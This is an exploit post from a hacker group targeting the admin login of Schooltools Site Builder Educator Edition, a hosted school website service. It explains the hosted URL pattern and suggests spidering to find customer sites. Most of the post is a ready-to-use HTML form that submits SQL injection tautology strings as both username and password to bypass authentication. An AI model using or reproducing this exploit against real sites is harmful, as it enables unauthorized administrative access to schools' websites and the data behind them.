Schooltools Site Builder Educator Edition remote SQL injection exploit.
dbb43d5af0232344d2fc03d06ec23b7fdbc0a99d0904970df94ebd74492234e1
I MurderSkillz from www.g00ns.net have found a auth bypass vulnerability in Schooltools Site Builder - Educator Edition (Possibly other versions). The vulnerability takes place in admin.asp. I believe what https://schooltools.us does is they host their customers and they all have https://sites.schooltools.us/sites/[ACCOUNT]/admin.asp Of course u can do a website spider to get these other folders/websites cause if you put in https://sites.schooltools.us/sites/ you get access denied.
Vuln found by MurderSkillz - g00ns.net
HTML coded by uid0 - exploitercode.com
Shoutz to all the g00ns and the ppl who fucking hate us =)
<---Start HTML--->
<style type="text/css">
<!--
body {
background-color: #000000;
}
.style1 {
font-family: Verdana, Arial, Helvetica, sans-serif;
color: #FFFF00;
}
.style3 {font-family: Verdana, Arial, Helvetica, sans-serif; color: #FFFF00; font-weight: bold; }
a:link {
color: #FFFF00;
}
a:visited {
color: #FFFF00;
}
a:hover {
color: #FFFF00;
}
a:active {
color: #FFFF00;
}
-->
</style>
<p><span class="style3"><a href="https://exploitercode.com" target="_blank">www.exploitercode.com</a> - <a href="https://www.g00ns.net" target="_blank">www.g00ns.net</a><br /><br />
Schooltools Site Builder - Educator Edition (Possibly other versions)<br />Orignal exploit by MurderSkillz and uid0</span><br /><br />
<span class="style1">To have this exploit work, edit the post action under the [ACCOUNT] brackets.</span>
<form name='login' method='post' action='https://sites.schooltools.us/sites/[ACCOUNT]/admin.asp?Action=Login'>
<input type="hidden" name='UserName' value="' or 'g00ns.net'='g00ns.net">
<input type="hidden" name='PassWord' value="' or 'g00ns.net'='g00ns.net">
<input type='submit' name='Submit' value='Login' class='button'>
</p>
<---END HTML--->